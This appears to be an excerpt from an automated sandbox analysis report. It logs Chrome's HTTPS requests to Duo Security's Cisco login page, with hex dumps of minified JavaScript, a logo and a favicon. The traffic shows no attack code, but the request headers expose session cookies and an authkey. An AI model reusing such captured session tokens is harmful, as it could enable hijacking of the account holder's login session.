                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 78 2e 73 70 65 65 64 73 3d 7b 73 6c 6f 77 3a 36 30 30 2c 66 61 73 74 3a 32 30 30 2c 5f 64 65 66 61 75 6c 74 3a 34 30 30 7d 2c 53 2e 66 6e 2e 64 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 29 7b 72 65 74 75 72 6e 20 72 3d 53 2e 66 78 26 26 53 2e 66 78 2e 73 70 65 65 64 73 5b 72 5d 7c 7c 72 2c 65 3d 65 7c 7c 22 66 78 22 2c 74 68 69 73 2e 71 75 65 75 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 74 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 6e 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74
                                                                                                                                          Data Ascii: x.speeds={slow:600,fast:200,_default:400},S.fn.delay=function(r,e){return r=S.fx&&S.fx.speeds[r]||r,e=e||"fx",this.queue(e,function(e,t){var n=C.setTimeout(e,r);t.stop=function(){C.clearTimeout(n)}})},tt=E.createElement("input"),nt=E.createElement("select
                                                                                                                                          2024-11-18 05:48:17 UTC8214INData Raw: 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 6d 28 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 28 74 68 69 73 29 2e 77 72 61 70 41 6c 6c 28 6e 3f 74 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 3a 74 29 7d 29 7d 2c 75 6e 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 65 6e 74 28 65 29 2e 6e 6f 74 28 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e
                                                                                                                                          Data Ascii: wrap:function(t){var n=m(t);return this.each(function(e){S(this).wrapAll(n?t.call(this,e):t)})},unwrap:function(e){return this.parent(e).not("body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          68192.168.2.165520852.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:25 UTC748OUTGET /static/js/page/email-first.js?v=488d0 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:25 UTC629INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:25 GMT
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          Content-Length: 1031501
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-fbd4d"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:25 UTC15749INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 65 6d 61 69 6c 2d 66 69 72 73 74 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6c 65 61 66 50 72 6f 74 6f 74 79 70 65 73 2c 67 65 74 50 72 6f 74 6f 2c 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 38 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 39 31 32 39 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f
                                                                                                                                          Data Ascii: /*! For license information please see email-first.js.LICENSE.txt */!function(){var leafPrototypes,getProto,__webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 70 62 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 62 2b 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 61 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2c 6f 62 5b 62 5d 3d 6f 62 5b 61 5d 7d 29 29 7d 29 29 3b 76 61 72 20 73 62 3d 41 28 7b 6d 65 6e 75 69 74 65 6d 3a 21 30 7d 2c 7b 61 72 65 61 3a 21 30 2c 62 61 73 65 3a 21 30 2c 62 72 3a 21 30 2c 63 6f 6c 3a 21 30 2c 65 6d 62 65 64 3a 21 30 2c 68 72 3a 21 30 2c 69 6d 67 3a 21 30 2c 69 6e 70 75 74 3a 21 30 2c 6b 65 79 67 65 6e 3a 21 30 2c 6c 69 6e 6b 3a 21 30 2c 6d 65 74 61 3a 21 30 2c 70 61 72 61 6d 3a 21 30 2c 73 6f 75 72 63 65 3a 21 30 2c 74 72 61 63 6b 3a 21 30 2c 77 62 72 3a 21 30 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 74 62
                                                                                                                                          Data Ascii: nction(a){pb.forEach((function(b){b=b+a.charAt(0).toUpperCase()+a.substring(1),ob[b]=ob[a]}))}));var sb=A({menuitem:!0},{area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0});function tb
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 61 29 7b 69 66 28 22 73 65 6c 65 63 74 69 6f 6e 63 68 61 6e 67 65 22 3d 3d 3d 61 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 61 7c 7c 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 70 65 29 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 61 2c 62 29 7b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 61 2c 62 29 7b 69 66 28 22 69 6e 70 75 74 22 3d 3d 3d 61 7c 7c 22 63 68 61 6e 67 65 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 76 61 72 20 47 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 30 21 3d 3d 61 7c
                                                                                                                                          Data Ascii: a){if("selectionchange"===a||"keyup"===a||"keydown"===a)return se(pe)}function De(a,b){if("click"===a)return se(b)}function Ee(a,b){if("input"===a||"change"===a)return se(b)}var Ge="function"==typeof Object.is?Object.is:function(a,b){return a===b&&(0!==a|
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 72 67 28 61 2c 62 2c 63 29 7b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 61 3b 29 7b 76 61 72 20 64 3d 61 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 3f 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 2c 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 29 3a 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 2c 61 3d 3d 3d 63 29 62 72 65 61 6b 3b 61 3d 61 5b 22 72 65 74 75 72 6e 22 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 67 28 61 2c 62 29 7b 6d 67 3d 61 2c 6f 67 3d 6e 67 3d 6e 75 6c 6c 2c 6e 75 6c 6c 21 3d 3d 28 61 3d 61 2e 64 65 70 65 6e 64 65 6e 63
                                                                                                                                          Data Ascii: }function rg(a,b,c){for(;null!==a;){var d=a.alternate;if((a.childLanes&b)!==b?(a.childLanes|=b,null!==d&&(d.childLanes|=b)):null!==d&&(d.childLanes&b)!==b&&(d.childLanes|=b),a===c)break;a=a["return"]}}function sg(a,b){mg=a,og=ng=null,null!==(a=a.dependenc
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 7d 64 2e 62 61 73 65 51 75 65 75 65 3d 65 3d 66 2c 63 2e 70 65 6e 64 69 6e 67 3d 6e 75 6c 6c 7d 69 66 28 6e 75 6c 6c 21 3d 3d 65 29 7b 66 3d 65 2e 6e 65 78 74 2c 64 3d 64 2e 62 61 73 65 53 74 61 74 65 3b 76 61 72 20 68 3d 67 3d 6e 75 6c 6c 2c 6b 3d 6e 75 6c 6c 2c 6c 3d 66 3b 64 6f 7b 76 61 72 20 6e 3d 6c 2e 6c 61 6e 65 3b 69 66 28 28 4f 68 26 6e 29 3d 3d 3d 6e 29 6e 75 6c 6c 21 3d 3d 6b 26 26 28 6b 3d 6b 2e 6e 65 78 74 3d 7b 6c 61 6e 65 3a 30 2c 61 63 74 69 6f 6e 3a 6c 2e 61 63 74 69 6f 6e 2c 68 61 73 45 61 67 65 72 53 74 61 74 65 3a 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 2c 65 61 67 65 72 53 74 61 74 65 3a 6c 2e 65 61 67 65 72 53 74 61 74 65 2c 6e 65 78 74 3a 6e 75 6c 6c 7d 29 2c 64 3d 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 3f 6c 2e 65 61 67
                                                                                                                                          Data Ascii: }d.baseQueue=e=f,c.pending=null}if(null!==e){f=e.next,d=d.baseState;var h=g=null,k=null,l=f;do{var n=l.lane;if((Oh&n)===n)null!==k&&(k=k.next={lane:0,action:l.action,hasEagerState:l.hasEagerState,eagerState:l.eagerState,next:null}),d=l.hasEagerState?l.eag
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 29 3b 65 6c 73 65 20 69 66 28 34 21 3d 3d 63 2e 74 61 67 26 26 6e 75 6c 6c 21 3d 3d 63 2e 63 68 69 6c 64 29 7b 63 2e 63 68 69 6c 64 5b 22 72 65 74 75 72 6e 22 5d 3d 63 2c 63 3d 63 2e 63 68 69 6c 64 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 63 3d 3d 3d 62 29 62 72 65 61 6b 3b 66 6f 72 28 3b 6e 75 6c 6c 3d 3d 3d 63 2e 73 69 62 6c 69 6e 67 3b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7c 7c 63 5b 22 72 65 74 75 72 6e 22 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 3b 63 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7d 63 2e 73 69 62 6c 69 6e 67 5b 22 72 65 74 75 72 6e 22 5d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 2c 63 3d 63 2e 73 69 62 6c 69 6e 67 7d 7d 2c 55 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 56 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c
                                                                                                                                          Data Ascii: );else if(4!==c.tag&&null!==c.child){c.child["return"]=c,c=c.child;continue}if(c===b)break;for(;null===c.sibling;){if(null===c["return"]||c["return"]===b)return;c=c["return"]}c.sibling["return"]=c["return"],c=c.sibling}},Ui=function(){},Vi=function(a,b,c,
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 7b 4e 6a 28 33 2c 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 29 2c 4f 6a 28 33 2c 61 29 7d 63 61 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 74 72 79 7b 4e 6a 28 35 2c 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 29 7d 63 61 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 7d 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 69 66 28 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 2c 33 32 26 61 2e 66 6c 61 67 73 29 7b 76 61 72 20 65 3d
                                                                                                                                          Data Ascii: {Nj(3,a,a["return"]),Oj(3,a)}catch(m){U(a,a["return"],m)}try{Nj(5,a,a["return"])}catch(m){U(a,a["return"],m)}}break;case 1:ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]);break;case 5:if(ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]),32&a.flags){var e=
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 3d 71 29 7b 71 5b 22 72 65 74 75 72 6e 22 5d 3d 79 2c 54 3d 71 3b 62 72 65 61 6b 7d 54 3d 79 7d 7d 7d 76 61 72 20 6d 3d 66 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6d 29 7b 76 61 72 20 77 3d 6d 2e 63 68 69 6c 64 3b 69 66 28 6e 75 6c 6c 21 3d 3d 77 29 7b 6d 2e 63 68 69 6c 64 3d 6e 75 6c 6c 3b 64 6f 7b 76 61 72 20 4a 3d 77 2e 73 69 62 6c 69 6e 67 3b 77 2e 73 69 62 6c 69 6e 67 3d 6e 75 6c 6c 2c 77 3d 4a 7d 77 68 69 6c 65 28 6e 75 6c 6c 21 3d 3d 77 29 7d 7d 54 3d 66 7d 7d 69 66 28 30 21 3d 28 32 30 36 34 26 66 2e 73 75 62 74 72 65 65 46 6c 61 67 73 29 26 26 6e 75 6c 6c 21 3d 3d 67 29 67 5b 22 72 65 74 75 72 6e 22 5d 3d 66 2c 54 3d 67 3b 65 6c 73 65 20 62 3a 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 54 3b 29 7b 69 66 28 30 21 3d 28 32 30 34 38
                                                                                                                                          Data Ascii: =q){q["return"]=y,T=q;break}T=y}}}var m=f.alternate;if(null!==m){var w=m.child;if(null!==w){m.child=null;do{var J=w.sibling;w.sibling=null,w=J}while(null!==w)}}T=f}}if(0!=(2064&f.subtreeFlags)&&null!==g)g["return"]=f,T=g;else b:for(;null!==T;){if(0!=(2048
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 65 62 70 61 63 6b 5f 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 44 43 45 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 29 74 72 79 7b 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 28 63 68 65 63 6b 44 43 45 29 7d 63 61 74 63 68 28 65 72 72 29 7b 63 6f 6e 73 6f 6c
                                                                                                                                          Data Ascii: ebpack_exports,__webpack_require__){"use strict";!function checkDCE(){if("undefined"!=typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE)}catch(err){consol
                                                                                                                                          2024-11-18 05:48:25 UTC16384INData Raw: 69 6d 65 73 22 2c 22 e2 a5 b6 22 3a 22 6c 74 6c 61 72 72 22 2c 22 e2 a9 bb 22 3a 22 6c 74 71 75 65 73 74 22 2c 22 e2 97 83 22 3a 22 6c 74 72 69 22 2c 22 e2 a6 96 22 3a 22 6c 74 72 50 61 72 22 2c 22 e2 a5 8a 22 3a 22 6c 75 72 64 73 68 61 72 22 2c 22 e2 a5 a6 22 3a 22 6c 75 72 75 68 61 72 22 2c 22 e2 89 a8 ef b8 80 22 3a 22 6c 76 6e 45 22 2c 22 c2 af 22 3a 22 6d 61 63 72 22 2c 22 e2 99 82 22 3a 22 6d 61 6c 65 22 2c 22 e2 9c a0 22 3a 22 6d 61 6c 74 22 2c 22 e2 a4 85 22 3a 22 4d 61 70 22 2c 22 e2 86 a6 22 3a 22 6d 61 70 22 2c 22 e2 86 a5 22 3a 22 6d 61 70 73 74 6f 75 70 22 2c 22 e2 96 ae 22 3a 22 6d 61 72 6b 65 72 22 2c 22 e2 a8 a9 22 3a 22 6d 63 6f 6d 6d 61 22 2c 22 d0 9c 22 3a 22 4d 63 79 22 2c 22 d0 bc 22 3a 22 6d 63 79 22 2c 22 e2 80 94 22 3a 22 6d 64 61
                                                                                                                                          Data Ascii: imes","":"ltlarr","":"ltquest","":"ltri","":"ltrPar","":"lurdshar","":"luruhar","":"lvnE","":"macr","":"male","":"malt","":"Map","":"map","":"mapstoup","":"marker","":"mcomma","":"Mcy","":"mcy","":"mda


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          69192.168.2.165520918.66.102.124436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:25 UTC728OUTGET /customization/account/pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw/logo_image.png?versionId=DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR HTTP/1.1
                                                                                                                                          Host: ux-asset-commercial.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:48:26 UTC602INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Content-Length: 7471
                                                                                                                                          Connection: close
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:27 GMT
                                                                                                                                          x-amz-replication-status: FAILED
                                                                                                                                          Last-Modified: Thu, 22 Sep 2022 21:29:05 GMT
                                                                                                                                          ETag: "9d4e6bed02b3b8860e0aa48b39a37b31"
                                                                                                                                          x-amz-meta-content-type: image/png
                                                                                                                                          x-amz-version-id: DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR
                                                                                                                                          x-amz-meta-content-length: 7471
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Server: AmazonS3
                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                          Via: 1.1 93b8205e2f07a7099af2e6fd126d9658.cloudfront.net (CloudFront)
                                                                                                                                          X-Amz-Cf-Pop: FRA56-P2
                                                                                                                                          X-Amz-Cf-Id: _KjtSKhln63YT1usSFncmiCRF3ugLzzetkBTu7UQGrbmY7bdz2bXYQ==
                                                                                                                                          2024-11-18 05:48:26 UTC7471INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e4 00 00 00 90 08 06 00 00 00 18 e4 c7 5a 00 00 00 09 70 48 59 73 00 00 21 38 00 00 21 38 01 45 96 31 60 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 1c c4 49 44 41 54 78 01 ed 9d 09 7c 54 d5 bd c7 7f e7 de 99 c9 06 21 64 67 8b b8 42 5d d0 aa 4f 05 44 88 24 b2 54 b4 7d 2a ae 55 aa b6 d6 b5 4f da 5a db a7 35 ed ab 5b ad b6 b6 b6 5a a5 d6 b6 6a 2b 15 b7 2a 6b 30 20 08 28 b8 54 2d e2 82 80 18 48 32 59 89 d9 66 e6 de f3 fe e7 4e 40 90 40 ee 2c 77 e6 ce f0 ff 7e b8 61 96 73 e7 9e ed 77 f6 f3 3f 00 c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 30 0c c3 24 07 81 03 81 75 eb bc 68 2f 2b 40 b7 91 09 e9 0b 21 6b 47 23 ca 0f
                                                                                                                                          Data Ascii: PNGIHDRZpHYs!8!8E1`sRGBgAMAaIDATx|T!dgB]OD$T}*UOZ5[Zj+*k0 (T-H2YfN@@,w~asw?0000000000$uh/+@!kG#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          70192.168.2.165521135.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:27 UTC1115OUTGET /static/images/favicon_duo.ico?v=e3716 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:27 UTC615INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:27 GMT
                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                          Content-Length: 6518
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-1976"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:27 UTC6518INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 28 05 00 00 26 00 00 00 20 20 00 00 01 00 20 00 28 14 00 00 4e 05 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 30 43 b2 64 9c 43 b2 64 e0 43 b2 64 fe 43 b2 64 f8 43 b2 64 de 43 b2 64 9c 43 b2 64 35 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 08 43 b2 64 9e 43 b2 64 fe 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 9d 43 b2 64 08 43 b2 64 00 43 b2 64 00 43 b2 64 00 43 b2 64 09 43 b2 64 c5 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43 b2 64 ff 43
                                                                                                                                          Data Ascii: (& (N( CdCdCdCdCd0CdCdCdCdCdCdCd5CdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdCdC


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          71192.168.2.165521218.66.102.124436248C:\Program Files\Google\Chrome\Application\chrome.exe
